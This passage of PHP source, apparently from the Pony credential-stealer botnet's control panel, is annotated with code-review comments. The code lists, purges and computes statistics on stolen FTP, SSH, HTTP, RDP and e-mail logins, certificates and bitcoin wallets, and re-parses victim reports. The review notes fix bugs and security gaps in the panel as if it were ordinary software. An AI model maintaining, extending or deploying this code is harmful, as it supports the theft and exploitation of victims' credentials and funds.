              $pos++;
          }

          foreach ($fresh as $label => $row_count) {
              $smarty->assign('new_' . $series_name . '_last_' . $label, $row_count);
          }

          $pony_db->set_multi_option($option_name, array(
              $offsets[0],
              $offsets[1],
              $offsets[2],
          ));
      }

      // --- last import dates (assigned only when a date exists) ----------
      $cert_last_import = $pony_db->get_last_cert_date();
      if ($cert_last_import !== false) {
          $smarty->assign('cert_last_import', $cert_last_import);
      }

      $wallet_last_import = $pony_db->get_last_wallet_date();
      if ($wallet_last_import !== false) {
          $smarty->assign('wallet_last_import', $wallet_last_import);
      }

      $pony_db->unlock_all_tables();
  }
  816.  
  817. // -------------------------------------------------------------------------------------------
  818. // Page processing code
  819. // -------------------------------------------------------------------------------------------
  820.  
  821. if ($admin_action == 'ftp')
  822. {
  823. // ---------------------------------------------------------------------------------------
  824. // FTP list: optional purge of stored FTP or SSH rows, then one page of rows is rendered.
       // $admin_action and $admin_routine are assigned before this part of the file.
  825.  
       // Both purge routines pass a constant WHERE clause to clear_table(); no request data is
       // concatenated into it here.
       // NOTE(review): the purge is gated only by priv_can_delete(); no anti-CSRF token check is
       // visible in this part of the file - confirm how the request is validated upstream.
  826. if ($admin_routine == 'clear_ftp')
  827. {
  828. if ($pony_db->priv_can_delete())
  829. {
  830. $pony_db->clear_table(CPONY_FTP_TABLE, "WHERE url_type='ftp'");
  831. clear_floating_offsets($pony_db);
  832. }
  833. else
  834. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
  835. }
  836. elseif ($admin_routine == 'clear_ssh')
  837. {
  838. if ($pony_db->priv_can_delete())
  839. {
  840. $pony_db->clear_table(CPONY_FTP_TABLE, "WHERE url_type='ssh'");
  841. clear_floating_offsets($pony_db);
  842. }
  843. else
  844. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
  845. }
  846.  
       // Paging state is kept server-side: the stored 'offset_ftp_list' option is passed to
       // get_ftp_list() together with a limit of 10 and the selector 'both'
       // (presumably ftp + ssh - confirm in get_ftp_list()).
  847. $offset_ftp_list = $pony_db->get_multi_option('offset_ftp_list', 1);
  848. $ftp_list = array();
  849. $pony_db->get_ftp_list(false, $ftp_list, 10, 'both', $offset_ftp_list[0]);
  850.  
       // Keep the raw module id under 'module', replace 'ftp_client' with its display name, and
       // blank the report link when report_id_exists() reports that the report is gone.
  851. foreach ($ftp_list as $ftp_item=>$ftp_value)
  852. {
  853. $ftp_list[$ftp_item]['module'] = $ftp_list[$ftp_item]['ftp_client'];
  854. $ftp_list[$ftp_item]['ftp_client'] = module_name_to_client_name($ftp_list[$ftp_item]['ftp_client']);
  855. if (!$pony_db->report_id_exists($ftp_list[$ftp_item]['report_id']))
  856. {
  857. $ftp_list[$ftp_item]['report_id'] = '';
  858. }
  859. }
  860.  
       // The ftp_id of the last returned row becomes the stored offset for the next request
       // (0 when the list is empty).
  861. if (count($ftp_list))
  862. {
  863. $first_id = $ftp_list[count($ftp_list)-1]['ftp_id'];
  864. } else
  865. {
  866. $first_id = 0;
  867. }
  868.  
  869. $pony_db->set_multi_option('offset_ftp_list', array($first_id));
  870.  
  871. apply_data_filters($smarty, false);
  872. smarty_assign_continents($smarty);
  873.  
  874. smarty_assign_common_vars($smarty, $pony_db);
  875. $smarty->assign('ftp_list', $ftp_list);
  876. $smarty->display('ftp_list.tpl');
  877. }
  878. if ($admin_action == 'http')
  879. {
  880. // ---------------------------------------------------------------------------------------
  881. // HTTP list: optional purge of stored http/https rows, then one page of rows is rendered.
       // This is a fresh 'if', not an 'else if' of the 'ftp' test above; the 'else if' chain for
       // the remaining actions starts from this statement.
  882.  
  883. smarty_assign_continents($smarty);
  884.  
       // The WHERE clause passed to clear_table() is a constant string.
       // NOTE(review): gated only by priv_can_delete(); no anti-CSRF token check is visible in
       // this part of the file - confirm how the request is validated upstream.
  885. if ($admin_routine == 'clear_http')
  886. {
  887. if ($pony_db->priv_can_delete())
  888. {
  889. $pony_db->clear_table(CPONY_FTP_TABLE, "WHERE (url_type='http') OR (url_type='https')");
  890. clear_floating_offsets($pony_db);
  891. }
  892. else
  893. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
  894. }
  895.  
       // Same server-side paging scheme as the FTP list: the stored 'offset_http_list' option
       // and a limit of 10 are passed to get_http_list().
  896. $offset_http_list = $pony_db->get_multi_option('offset_http_list', 1);
  897. $http_list = array();
  898. $pony_db->get_http_list(false, $http_list, 10, 'both', $offset_http_list[0]);
  899.  
       // Keep the raw module id under 'module', replace 'ftp_client' with its display name, and
       // blank the report link when the report no longer exists.
  900. foreach ($http_list as $http_item=>$http_value)
  901. {
  902. $http_list[$http_item]['module'] = $http_list[$http_item]['ftp_client'];
  903. $http_list[$http_item]['ftp_client'] = module_name_to_client_name($http_list[$http_item]['ftp_client']);
  904. if (!$pony_db->report_id_exists($http_list[$http_item]['report_id']))
  905. {
  906. $http_list[$http_item]['report_id'] = '';
  907. }
  908. }
  909.  
       // The ftp_id of the last returned row becomes the stored offset (0 when the list is empty).
  910. if (count($http_list))
  911. {
  912. $first_id = $http_list[count($http_list)-1]['ftp_id'];
  913. } else
  914. {
  915. $first_id = 0;
  916. }
  917.  
  918. $pony_db->set_multi_option('offset_http_list', array($first_id));
  919.  
  920. apply_data_filters($smarty, false, 'http');
       // smarty_assign_continents() was already called at the top of this branch.
  921. smarty_assign_continents($smarty);
  922.  
  923. smarty_assign_common_vars($smarty, $pony_db);
  924. $smarty->assign('http_list', $http_list);
  925. $smarty->display('http_list.tpl');
  926. }
  927. else if ($admin_action == 'other')
  928. {
  929. // ---------------------------------------------------------------------------------------
  930. // Other: purge routines for the certificate, wallet, RDP and e-mail data, then one page of
       // stored e-mail rows is rendered through other.tpl.
       // Every purge below is gated by priv_can_delete() and passes either no WHERE clause or a
       // constant one to clear_table().
       // NOTE(review): no anti-CSRF token check is visible in this part of the file - confirm
       // how the request is validated upstream.
  931. if ($admin_routine == 'clear_cert')
  932. {
  933. if ($pony_db->priv_can_delete())
  934. {
  935. $pony_db->clear_table(CPONY_CERT_TABLE);
  936. show_smarty_success($smarty);
  937. }
  938. else
  939. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
  940. } else if ($admin_routine == 'clear_wallet')
  941. {
  942. if ($pony_db->priv_can_delete())
  943. {
  944. $pony_db->clear_table(CPONY_WALLET_TABLE);
  945. show_smarty_success($smarty);
  946. }
  947. else
  948. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
  949. } else if ($admin_routine == 'clear_rdp')
  950. {
  951. if ($pony_db->priv_can_delete())
  952. {
       // RDP rows live in the same table as the FTP/HTTP rows and are selected by url_type.
  953. $pony_db->clear_table(CPONY_FTP_TABLE, "WHERE (url_type='rdp')");
  954. clear_floating_offsets($pony_db);
  955. show_smarty_success($smarty);
  956. }
  957. else
  958. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
  959. } else if ($admin_routine == 'clear_email')
  960. {
  961. if ($pony_db->priv_can_delete())
  962. {
  963. $pony_db->clear_table(CPONY_EMAIL_TABLE);
  964. clear_floating_offsets($pony_db);
  965. show_smarty_success($smarty);
  966. }
  967. else
  968. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
  969. }
  970.  
       // Server-side paging: the stored 'offset_email_list' option and a limit of 10 are passed
       // to get_email_list().
  971. $offset_email_list = $pony_db->get_multi_option('offset_email_list', 1);
  972. $email_list = array();
  973. $pony_db->get_email_list(false, $email_list, 10, '', $offset_email_list[0]);
  974.  
       // Keep the raw module id under 'module' and replace 'email_client' with its display name.
  975. foreach ($email_list as $email_item=>$email_value)
  976. {
  977. $email_list[$email_item]['module'] = $email_list[$email_item]['email_client'];
  978. $email_list[$email_item]['email_client'] = module_name_to_client_name($email_list[$email_item]['email_client']);
  979. }
  980.  
       // The email_id of the last returned row becomes the stored offset (0 when the list is empty).
  981. if (count($email_list))
  982. {
  983. $first_id = $email_list[count($email_list)-1]['email_id'];
  984. } else
  985. {
  986. $first_id = 0;
  987. }
  988.  
  989. $pony_db->set_multi_option('offset_email_list', array($first_id));
  990. $smarty->assign('email_list', $email_list);
  991.  
  992. smarty_assign_common_vars($smarty, $pony_db);
  993. $smarty->display("other.tpl");
  994. }
  995. else if ($admin_action == 'stats')
  996. {
  997. // ---------------------------------------------------------------------------------------
  998. // Statistics: per-client, per-domain and per-country counts are read from pony_db, turned
        // into percentage rows and rendered through stats.tpl. This branch only reads data.
  999.  
  1000. // FTP clients statistics
  1001. $ftp_list = array();
  1002. $ftp_clients_list = array();
  1003. if ($pony_db->get_ftp_clients_stats($ftp_list) && count($ftp_list) > 0)
  1004. {
  1005. /*
  1006. // Show all FTP clients, even with 0 passwords grabbed
  1007. foreach ($global_module_list as $module_list_item)
  1008. {
  1009. // skip system info module
  1010. if ($module_list_item[0] == $global_module_list[0][0])
  1011. continue;
  1012. if (array_key_exists($module_list_item[0], $ftp_list) === false)
  1013. {
  1014. $ftp_list[$module_list_item[0]] = '0';
  1015. }
  1016. }*/
  1017.  
  1018. $sum = 0;
  1019.  
  1020. foreach ($ftp_list as $count)
  1021. $sum += intval($count);
  1022.  
        // NOTE(review): the guard above tests count($ftp_list) > 0, not $sum > 0, so the division
        // below divides by zero if every count is 0. The same pattern is used in the HTTP, e-mail,
        // domain and bitcoin sections; only the country section tests its sums first.
  1023. foreach ($ftp_list as $ftp_client=>$count)
  1024. {
  1025. array_push($ftp_clients_list, array(
  1026. 'module'=>$ftp_client,
  1027. 'name'=>module_name_to_client_name($ftp_client),
  1028. 'count'=>$count,
  1029. 'percentage'=>sprintf("%01.2f", $count/$sum*100)
  1030. ));
  1031. }
  1032. }
  1033.  
  1034. // HTTP clients statistics
  1035. $http_list = array();
  1036. $http_clients_list = array();
  1037. if ($pony_db->get_http_clients_stats($http_list) && count($http_list) > 0)
  1038. {
  1039. $sum = 0;
  1040.  
  1041. foreach ($http_list as $count)
  1042. $sum += intval($count);
  1043.  
  1044. foreach ($http_list as $http_client=>$count)
  1045. {
  1046. array_push($http_clients_list, array(
  1047. 'module'=>$http_client,
  1048. 'name'=>module_name_to_client_name($http_client),
  1049. 'count'=>$count,
  1050. 'percentage'=>sprintf("%01.2f", $count/$sum*100)
  1051. ));
  1052. }
  1053. }
  1054.  
  1055. // E-mail clients statistics
  1056. $email_list = array();
  1057. $email_clients_list = array();
  1058. if ($pony_db->get_email_clients_stats($email_list) && count($email_list) > 0)
  1059. {
  1060. $sum = 0;
  1061.  
  1062. foreach ($email_list as $count)
  1063. $sum += intval($count);
  1064.  
  1065. foreach ($email_list as $email_client=>$count)
  1066. {
  1067. array_push($email_clients_list, array(
  1068. 'module'=>$email_client,
  1069. 'name'=>module_name_to_client_name($email_client),
  1070. 'count'=>$count,
  1071. 'percentage'=>sprintf("%01.2f", $count/$sum*100)
  1072. ));
  1073. }
  1074. }
  1075.  
  1076. // HTTP domains statistics
  1077. $http_domain_list = array();
  1078. $http_domain_stats = array();
  1079. if ($pony_db->get_http_domain_stats($http_domain_list) && count($http_domain_list))
  1080. {
  1081. $sum = 0;
  1082.  
  1083. foreach ($http_domain_list as $count)
  1084. $sum += intval($count);
  1085.  
        // The domain key is copied into the template row as-is; any output escaping has to happen
        // in stats.tpl, which is not visible here.
  1086. foreach ($http_domain_list as $domain=>$count)
  1087. {
  1088. array_push($http_domain_stats, array(
  1089. 'domain'=>$domain,
  1090. 'count'=>$count,
  1091. 'percentage'=>sprintf("%01.2f", $count/$sum*100)
  1092. ));
  1093. }
  1094. }
  1095.  
  1096. // Bitcoin clients statistics
  1097. $bitcoin_list = array();
  1098. $bitcoin_clients_list = array();
  1099. if ($pony_db->get_bitcoin_clients_stats($bitcoin_list) && count($bitcoin_list) > 0)
  1100. {
  1101. $sum = 0;
  1102.  
  1103. foreach ($bitcoin_list as $count)
  1104. $sum += intval($count);
  1105.  
  1106. foreach ($bitcoin_list as $bitcoin_client=>$count)
  1107. {
  1108. array_push($bitcoin_clients_list, array(
  1109. 'module'=>$bitcoin_client,
  1110. 'name'=>module_name_to_client_name($bitcoin_client),
  1111. 'count'=>$count,
  1112. 'percentage'=>sprintf("%01.2f", $count/$sum*100)
  1113. ));
  1114. }
  1115. }
  1116.  
  1117. // Country statistics
  1118. $country_list = array();
  1119. $smarty_country_list = array();
  1120. if ($pony_db->get_country_stats($country_list) && count($country_list) > 0)
  1121. {
  1122. // FTP/HTTP stats
        // $country_ftp_list is not initialised here before it is passed; presumably the
        // get_*_country_stats() methods fill it by reference - the is_array() test below covers
        // the case where they do not.
  1123. if ($enable_http_mode && ($show_http_to_users || $pony_db->priv_is_admin()))
  1124. $pony_db->get_all_country_stats($country_ftp_list); // ftp/ssh/rdp/http/https/...
  1125. else
  1126. $pony_db->get_ftp_country_stats($country_ftp_list); // ftp/ssh only
  1127.  
  1128. if (is_array($country_ftp_list))
  1129. {
  1130. foreach ($country_list as $country_name=>$country_value)
  1131. {
  1132. if (isset($country_ftp_list[$country_name]['ftp_count']))
  1133. $country_list[$country_name]['ftp_count'] = $country_ftp_list[$country_name]['ftp_count'];
  1134. else
  1135. $country_list[$country_name]['ftp_count'] = 0;
  1136. }
  1137.  
  1138. }
  1139.  
  1140. // E-mail stats
        // From here on 'ftp_count' is a running total per country: the e-mail, certificate and
        // wallet counts below are added onto it.
  1141. if ($enable_email_mode && ($show_email_to_users || $pony_db->priv_is_admin()))
  1142. {
  1143. $pony_db->get_email_country_stats($country_email_list);
  1144. if (is_array($country_email_list))
  1145. {
  1146. foreach ($country_list as $country_name=>$country_value)
  1147. {
  1148. if (isset($country_email_list[$country_name]['email_count']))
  1149. {
  1150. if (!isset($country_list[$country_name]['ftp_count']))
  1151. $country_list[$country_name]['ftp_count'] = 0;
  1152. $country_list[$country_name]['ftp_count'] += $country_email_list[$country_name]['email_count'];
  1153. }
  1154. }
  1155.  
  1156. }
  1157. }
  1158.  
  1159. // Certificates
  1160. $pony_db->get_cert_country_stats($country_cert_list);
  1161. if (is_array($country_cert_list))
  1162. {
  1163. foreach ($country_list as $country_name=>$country_value)
  1164. {
  1165. if (isset($country_cert_list[$country_name]['cert_count']))
  1166. {
  1167. if (!isset($country_list[$country_name]['ftp_count']))
  1168. $country_list[$country_name]['ftp_count'] = 0;
  1169. $country_list[$country_name]['ftp_count'] += $country_cert_list[$country_name]['cert_count'];
  1170. }
  1171. }
  1172. }
  1173.  
  1174. // Wallets
  1175. $pony_db->get_wallet_country_stats($country_wallet_list);
  1176. if (is_array($country_wallet_list))
  1177. {
  1178. foreach ($country_list as $country_name=>$country_value)
  1179. {
  1180. if (isset($country_wallet_list[$country_name]['wallet_count']))
  1181. {
  1182. if (!isset($country_list[$country_name]['ftp_count']))
  1183. $country_list[$country_name]['ftp_count'] = 0;
  1184. $country_list[$country_name]['ftp_count'] += $country_wallet_list[$country_name]['wallet_count'];
  1185. }
  1186. }
  1187. }
  1188.  
  1189. $report_sum = 0;
  1190. $ftp_sum = 0;
  1191.  
  1192. foreach ($country_list as $count_array)
  1193. $report_sum += intval($count_array['report_count']);
  1194. foreach ($country_list as $count_array)
  1195. if (isset($count_array['ftp_count']))
  1196. $ftp_sum += intval($count_array['ftp_count']);
  1197.  
        // Build one template row per country code; each percentage is left as '' when its sum is 0.
        // assign() is defined elsewhere; presumably it supplies a default for an unset value - confirm.
  1198. $geo_ip = new GeoIP();
  1199. foreach ($country_list as $country_code=>$count_array)
  1200. {
  1201. if ($report_sum != 0)
  1202. $report_percentage = sprintf("%01.2f", $count_array['report_count']/$report_sum*100);
  1203. else
  1204. $report_percentage = '';
  1205.  
  1206. if ($ftp_sum != 0)
  1207. $ftp_percentage = sprintf("%01.2f", intval(assign($count_array['ftp_count']))/$ftp_sum*100);
  1208. else
  1209. $ftp_percentage = '';
  1210.  
        // $country and $flag_url are not read again in the visible code.
  1211. $country = '';
  1212. $flag_url = '';
  1213. $country_name = geoip_country_code_to_country_name($geo_ip, $country_code);
  1214.  
  1215. array_push($smarty_country_list, array("country_name"=>$country_name,
  1216. "country_code"=>$country_code,
  1217. "ftp_count"=>intval(assign($count_array['ftp_count'])), "report_count"=>$count_array['report_count'],
  1218. "report_percentage"=>$report_percentage,
  1219. "ftp_percentage"=>$ftp_percentage));
  1220. }
  1221. }
  1222.  
  1223. $smarty->assign('http_clients_list', $http_clients_list);
  1224. $smarty->assign('bitcoin_clients_list', $bitcoin_clients_list);
  1225. $smarty->assign('ftp_clients_list', $ftp_clients_list);
  1226. $smarty->assign('email_clients_list', $email_clients_list);
  1227. $smarty->assign('country_list', $smarty_country_list);
  1228. $smarty->assign('http_domain_list', $http_domain_stats);
  1229. $smarty->display('stats.tpl');
  1230. }
  1231. else if ($admin_action == 'ping')
  1232. {
  1233. // ---------------------------------------------------------------------------------------
  1234. // Domain management: add or delete an entry of the stored domain list, then render the
        // list through domains.tpl. The whole branch requires $show_domains and priv_can_delete().
  1235. if (!$show_domains || !$pony_db->priv_can_delete())
  1236. {
  1237. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
  1238. } else
  1239. {
        // NOTE(review): 'domain' and 'domain_id' come from $_REQUEST and are passed to the
        // pony_db methods after trim() only, so any escaping or validation has to happen inside
        // add_domain() / delete_domain(), which are not visible here. No anti-CSRF token check
        // is visible in this part of the file either.
        // The literal 'http://' is skipped on add; presumably it is the form field's
        // pre-filled value - confirm against domains.tpl.
  1240. if ($admin_routine == 'add')
  1241. {
  1242. if (trim(assign($_REQUEST['domain'])) != 'http://')
  1243. $pony_db->add_domain(trim(assign($_REQUEST['domain'])));
  1244. } else if ($admin_routine == 'delete' && nonempty($_REQUEST['domain_id']))
  1245. {
  1246. $pony_db->delete_domain(trim(assign($_REQUEST['domain_id'])));
  1247. }
  1248.  
  1249. $domain_list = array();
  1250. $pony_db->get_domains($domain_list);
  1251.  
  1252. $smarty->assign("domain_list", $domain_list);
  1253. $smarty->display('domains.tpl');
  1254. }
  1255. }
  1256. else if ($admin_action == 'log')
  1257. {
  1258. // ---------------------------------------------------------------------------------------
  1259. // Logs: optional purge of the log table, then a filtered, paginated log listing is
        // rendered through log_list.tpl.
  1260. if ($admin_routine == 'clear_log')
  1261. {
  1262. if ($pony_db->priv_can_delete())
  1263. {
  1264. $pony_db->delete_log_items(CPONY_LOG_TABLE);
  1265. clear_floating_offsets($pony_db);
  1266. }
  1267. else
  1268. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
  1269. }
  1270.  
        // NOTE(review): the three filter values come from $_REQUEST and are only trimmed here;
        // they are handed to the pony_db filter methods below, so SQL escaping has to happen
        // inside those methods, which are not visible in this part of the file.
  1271. $filter_ip = trim(assign($_REQUEST['filter_ip']));
  1272. $filter_hwid = trim(assign($_REQUEST['filter_hwid']));
  1273. $filter_notify = trim(assign($_REQUEST['filter_notify']));
        // 'next' is forced to an integer with intval() and shifted down by one when positive
        // before it is passed on as the list position.
  1274. $next = trim(assign($_REQUEST['next']));
  1275. if (strlen($next) == 0)
  1276. $next = '0';
  1277. $next = intval($next);
  1278. if ($next > 0)
  1279. $next--;
  1280.  
  1281. $max_results = 25; // log lines per page
  1282.  
  1283. $total_items_count = $pony_db->get_log_row_count_filter($filter_ip, $filter_hwid, $filter_notify);
  1284.  
  1285. $log_list = array();
  1286.  
  1287. $pony_db->get_log_list_report_filter($log_list, $next, $max_results, false, $filter_ip, $filter_hwid, $filter_notify);
  1288.  
        // Re-attach the active filters to the pagination URL.
        // NOTE(review): the values are HTML-escaped with htmlspecialchars() (cp1251) but not
        // URL-encoded, so a value containing '&', '#', '+' or a space does not survive the
        // round trip through the query string unchanged.
  1289. $filter = '';
  1290. if (strlen($filter_ip))
  1291. $filter .= '&filter_ip='.htmlspecialchars($filter_ip, ENT_QUOTES, 'cp1251');
  1292. if (strlen($filter_hwid))
  1293. $filter .= '&filter_hwid='.htmlspecialchars($filter_hwid, ENT_QUOTES, 'cp1251');
  1294. if (strlen($filter_notify))
  1295. $filter .= '&filter_notify='.htmlspecialchars($filter_notify, ENT_QUOTES, 'cp1251');
  1296.  
        // Reset the paginator, then configure it: 25 rows per page, page limit 50.
  1297. SmartyPaginate::disconnect();
  1298. SmartyPaginate::connect();
  1299. SmartyPaginate::setLimit($max_results);
  1300. SmartyPaginate::setPageLimit(50);
  1301. SmartyPaginate::setURL($self_file."?&action=log".$filter);
  1302. SmartyPaginate::setTotal($total_items_count);
  1303. SmartyPaginate::setPrevText($lang['Previous']);
  1304. SmartyPaginate::setNextText($lang['Next']);
  1305. SmartyPaginate::assign($smarty);
  1306.  
  1307. smarty_assign_common_vars($smarty, $pony_db);
  1308. $smarty->assign("log_list", $log_list);
  1309. $smarty->display('log_list.tpl');
  1310. }
  1311. else if ($admin_action == 'reports')
  1312. {
  1313. // ---------------------------------------------------------------------------------------
  1314. // Reports: purge all reports, delete one report, show or re-parse a single report, or
        // (for any other routine) render the filtered, paginated report list.
  1315. if ($admin_routine == 'clear_reports')
  1316. {
  1317. if ($pony_db->priv_can_delete())
  1318. {
  1319. $pony_db->clear_table(CPONY_REPORT_TABLE);
  1320. $pony_db->clear_table(CPONY_REPORT_DATA_TABLE);
  1321. clear_floating_offsets($pony_db);
  1322. } else
  1323. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
  1324. }
        // A separate 'if': the 'elseif' for view_report / reparse / confirm_delete below belongs
        // to this test, not to the clear_reports test above.
  1325. if ($admin_routine == 'delete')
  1326. {
  1327. if ($pony_db->priv_can_delete())
  1328. {
        // NOTE(review): report_id comes from $_REQUEST and is only trimmed before it reaches
        // report_remove_errors() / report_remove(); escaping has to happen inside those
        // methods, which are not visible here.
  1329. $report_id = trim(assign($_REQUEST['report_id']));
  1330. $pony_db->report_remove_errors($report_id);
  1331. $pony_db->report_remove($report_id);
  1332. clear_floating_offsets($pony_db);
  1333. } else
  1334. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
  1335. }
  1336. elseif ($admin_routine == 'view_report' || $admin_routine == 'reparse' || $admin_routine == 'confirm_delete')
  1337. {
  1338. // View detailed report information
        // NOTE(review): unlike the purge and delete routines, nothing in this sub-branch calls
        // priv_can_delete() or priv_is_admin(), although 'reparse' writes to the database
        // through update_parsed_report() - confirm whether that is intended.
  1339. $log_id = trim(assign($_REQUEST['log_id']));
  1340. $report_id = trim(assign($_REQUEST['report_id']));
  1341.  
        // The WHERE clause is built by string concatenation; report_id is escaped with
        // mysql_real_escape_string(), a function of the legacy ext/mysql API that was removed
        // in PHP 7.0.
  1342. $report_size = $pony_db->get_report_sum_linked("WHERE report_id='".mysql_real_escape_string($report_id)."'");
  1343.  
        // report_id and log_id are assigned to the template as received; output escaping is up
        // to view_report.tpl, which is not visible here.
  1344. $smarty->assign('report_id', $report_id);
  1345. $smarty->assign('report_size', $report_size);
  1346. $smarty->assign('log_id', $log_id);
  1347.  
  1348. $log_item_result = $pony_db->get_log_item($log_id);
  1349. $report_item_result = $pony_db->get_report_item($report_id);
  1350.  
  1351. if ($pony_db->state && is_array($report_item_result))
  1352. {
  1353. $report_item_result['report_source_ip_country_code'] = geo_ip_country_code($report_item_result['report_source_ip']);
  1354. $report_item_result['report_source_ip_country_name'] = geo_ip_country_name($report_item_result['report_source_ip']);
  1355. }
  1356. $smarty->assign('report', $report_item_result);
  1357. $smarty->assign('log_item', $log_item_result);
  1358. $smarty->display('view_report.tpl');
  1359.  
  1360. if ($pony_db->state && is_array($report_item_result))
  1361. {
        // A placeholder element is emitted and flushed before the parsing below starts; the
        // script block echoed at the end of this section hides it again.
  1362. echo "<p id='wait_report_data'><span class='wait'></span></p>";
  1363.  
  1364. my_flush();
  1365.  
  1366. if ($admin_routine == 'reparse')
  1367. {
        // Row counts are taken before and after the re-parse; their differences are summed into
        // the single 'parse_new_ftp' template value below.
  1368. $ftp_count_before_reparse = $pony_db->get_report_linked_passwords_count($report_id);
  1369. $cert_count_before_reparse = $pony_db->get_table_row_count(CPONY_CERT_TABLE);
  1370. $wallet_count_before_reparse = $pony_db->get_table_row_count(CPONY_WALLET_TABLE);
  1371. $email_count_before_reparse = $pony_db->get_table_row_count(CPONY_EMAIL_TABLE);
  1372.  
        // The stored report blob is processed again with the report password read from the
        // options table earlier in the file.
  1373. $report = new report_parser($pony_report_options);
  1374. $parse_result = $report->process_report($report_item_result['data'], $pony_db_report_password);
  1375. if ($parse_result)
  1376. {
        // HTTP and e-mail lines are written back only when the matching mode is enabled;
        // RDP lines are always merged in.
  1377. if ($enable_http_mode)
  1378. $url_list_array = array_merge($report->ftp_lines, $report->http_lines);
  1379. else
  1380. $url_list_array = $report->ftp_lines;
  1381.  
  1382. $url_list_array = array_merge($url_list_array, $report->rdp_lines);
  1383.  
  1384. if ($enable_email_mode)
  1385. {
  1386. $email_lines = $report->email_lines;
  1387. } else
  1388. {
  1389. $email_lines = null;
  1390. }
  1391.  
  1392. $pony_db->update_parsed_report($report_id, $report->report_os_name, $report->report_is_win64, $report->report_is_admin,
  1393. $report->report_hwid, $report->report_version_id, $url_list_array, null, $report->cert_lines, $report->wallet_lines, $email_lines);
        // Stored parse errors for this report are dropped when the new parse logged nothing.
  1394. if (!count($report->log->log_lines))
  1395. {
  1396. $pony_db->report_remove_errors($report_id);
  1397. }
  1398. }
  1399. $smarty->assign('parse_result', $parse_result);
  1400. $smarty->assign('parse_new_ftp', $pony_db->get_report_linked_passwords_count($report_id)-$ftp_count_before_reparse
  1401. + $pony_db->get_table_row_count(CPONY_CERT_TABLE)-$cert_count_before_reparse
  1402. + $pony_db->get_table_row_count(CPONY_WALLET_TABLE)-$wallet_count_before_reparse
  1403. + $pony_db->get_table_row_count(CPONY_EMAIL_TABLE)-$email_count_before_reparse);
  1404. clear_floating_offsets($pony_db);
  1405. }
  1406.  
  1407. // enable debug mode
        // The two flags are saved, forced to true for a second parse of the same report whose
        // log lines are shown through debug_report.tpl, and restored at the end of this section.
        // This second parse does not call update_parsed_report().
  1408. global $global_verbose_log, $global_allow_all_ftp;
  1409. $old_global_verbose_log = $global_verbose_log;
  1410. $old_global_allow_all_ftp = $global_allow_all_ftp;
  1411.  
  1412. $global_verbose_log = true;
  1413. $global_allow_all_ftp = true;
  1414.  
  1415. $report = new report_parser($pony_report_options);
  1416. $parse_result = $report->process_report($report_item_result['data'], $pony_db_report_password);
  1417.  
        // Log lines tagged NOTIFY_NEW_HTTP: / NOTIFY_NEW_EMAIL: are shown only when the matching
        // mode is enabled and the viewer is an admin or the show_*_to_users flag is set; every
        // other line is always shown.
  1418. $log = $report->log->log_lines;
  1419. $log_list = array();
  1420. foreach ($log as $log_list_item)
  1421. {
  1422. list($log_line, $log_extra) = $log_list_item;
  1423. if (strpos($log_line, 'NOTIFY_NEW_HTTP:') !== false)
  1424. {
  1425. if ($enable_http_mode && ($show_http_to_users || $pony_db->priv_is_admin()))
  1426. {
  1427. array_push($log_list, array('log_line'=>$log_line, 'log_extra'=>$log_extra));
  1428. }
  1429. } else if (strpos($log_line, 'NOTIFY_NEW_EMAIL:') !== false)
  1430. {
  1431. if ($enable_email_mode && ($show_email_to_users || $pony_db->priv_is_admin()))
  1432. {
  1433. array_push($log_list, array('log_line'=>$log_line, 'log_extra'=>$log_extra));
  1434. }
  1435. } else
  1436.  
        // Brace-less else: the array_push() on the next code line is its whole body.
  1437. array_push($log_list, array('log_line'=>$log_line, 'log_extra'=>$log_extra));
  1438.  
  1439. }
  1440.  
  1441. $smarty->assign('log_list', $log_list);
  1442. $smarty->display('debug_report.tpl');
  1443.  
  1444. echo '<script type="text/javascript">
  1445. //<![CDATA[
  1446. $("#wait_report_data").hide();
  1447. //]]>
  1448. </script>';
  1449.  
  1450. // revert debug mode change
  1451. $global_verbose_log = $old_global_verbose_log;
  1452. $global_allow_all_ftp = $old_global_allow_all_ftp;
  1453. }
  1454. }
  1455.  
        // Report list: runs for every routine except the three single-report views above.
  1456. if ($admin_routine != 'view_report' && $admin_routine != 'reparse' && $admin_routine != 'confirm_delete')
  1457. {
        // NOTE(review): the filter values come from $_REQUEST and are only trimmed here; SQL
        // escaping has to happen inside the pony_db filter methods, which are not visible in
        // this part of the file.
  1458. $filter_string = trim(assign($_REQUEST['filter_string']));
  1459. $filter_ip = trim(assign($_REQUEST['filter_ip']));
  1460. $filter_hwid = trim(assign($_REQUEST['filter_hwid']));
  1461. $filter_nonparsed = trim(assign($_REQUEST['filter_nonparsed']));
  1462. $filter_has_passwords = trim(assign($_REQUEST['filter_has_passwords']));
  1463. $next = trim(assign($_REQUEST['next']));
  1464. if (strlen($next) == 0)
  1465. $next = '0';
  1466. $next = intval($next);
  1467.  
  1468. if ($next > 0)
  1469. $next--;
  1470.  
  1471. $total_items_count = $pony_db->get_report_row_count_filter($filter_ip, $filter_hwid, $filter_nonparsed, $filter_has_passwords, $filter_string);
  1472. $max_results = 25;
  1473.  
  1474. $report_list = array();
  1475. $pony_db->get_report_list_filter($report_list, $next, $max_results, $filter_ip, $filter_hwid, $filter_nonparsed, $filter_has_passwords, $filter_string);
  1476. $geo_ip = new GeoIP();
  1477.  
        // Add a display name for each row's country code ('' when the code is missing or empty).
  1478. foreach ($report_list as $report_list_item => $report_list_value)
  1479. {
  1480. if (isset($report_list[$report_list_item]['report_country']) && strlen($report_list[$report_list_item]['report_country']))
  1481. {
  1482. $report_list[$report_list_item]['report_country_name'] = geoip_country_code_to_country_name($geo_ip, $report_list[$report_list_item]['report_country']);
  1483. } else
  1484. {
  1485. $report_list[$report_list_item]['report_country_name'] = '';
  1486. }
  1487. }
  1488.  
        // Re-attach the active filters to the pagination URL.
        // NOTE(review): values are HTML-escaped with htmlspecialchars() (cp1251) but not
